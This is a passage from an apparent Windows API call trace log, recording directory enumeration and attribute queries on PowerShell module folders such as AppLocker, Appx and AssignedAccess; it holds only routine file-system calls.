ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.121] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0140.121] FindNextFileW (in: hFindFile=0x1e3371a29c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0140.121] FindClose (in: hFindFile=0x1e3371a29c0 | out: hFindFile=0x1e3371a29c0) returned 1 [0140.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.136] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0140.136] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.136] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.136] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0140.136] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.136] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.136] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xb156f8d8f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0140.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.136] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de20 | out: lpFileInformation=0xb156f8de20*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0140.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.137] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", nBufferLength=0x105, lpBuffer=0xb156f8d870, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0140.137] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0xb156f8daa0 | out: lpFindFileData=0xb156f8daa0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.137] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.137] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0140.137] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0140.137] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.138] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0140.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.138] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0140.138] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.138] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.138] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0140.138] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0140.138] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0140.138] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.139] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.139] FindClose (in: hFindFile=0x1e3371a24e0 | out: hFindFile=0x1e3371a24e0) returned 1 [0140.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.139] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0140.139] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.139] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.139] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0140.139] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0140.139] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0140.140] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.140] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 0 [0140.140] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc60) returned 1 [0140.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc20) returned 1 [0140.140] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xb156f8d8f0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0140.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd40) returned 1 [0140.140] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0xb156f8de20 | out: lpFileInformation=0xb156f8de20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0140.140] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dd00) returned 1 [0140.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd90) returned 1 [0140.140] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", nBufferLength=0x105, lpBuffer=0xb156f8d870, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0140.140] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\*"), lpFindFileData=0xb156f8daa0 | out: lpFindFileData=0xb156f8daa0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a20c0 [0140.141] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.141] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x126d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.format.ps1xml", cAlternateFileName="")) returned 1 [0140.141] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x352, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psd1", cAlternateFileName="")) returned 1 [0140.141] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x12c26621, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x12c26621, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x12c26621, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xec1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Appx.psm1", cAlternateFileName="")) returned 1 [0140.141] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe8d4b97, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0140.141] FindNextFileW (in: hFindFile=0x1e3371a20c0, lpFindFileData=0xb156f8da60 | out: lpFindFileData=0xb156f8da60*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0140.141] FindClose (in: hFindFile=0x1e3371a20c0 | out: hFindFile=0x1e3371a20c0) returned 1 [0140.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dcc0) returned 1 [0140.141] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8dc80) returned 1 [0140.141] GetFileAttributesW (lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Appx\\Appx.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx\\appx.psd1")) returned 0x20 [0140.142] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8dd30) returned 1 [0140.142] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x105, lpBuffer=0xb156f8d810, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0140.142] FindFirstFileW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\AssignedAccess\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess\\*"), lpFindFileData=0xb156f8da40 | out: lpFindFileData=0xb156f8da40*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e3371a24e0 [0140.142] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0140.142] FindNextFileW (in: hFindFile=0x1e3371a24e0, lpFindFileData=0xb156f8da00 | out: lpFindFileData=0xb156f8da00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37eb452f, ftCreationTime.dwHighDateTime=0x1d112e3, 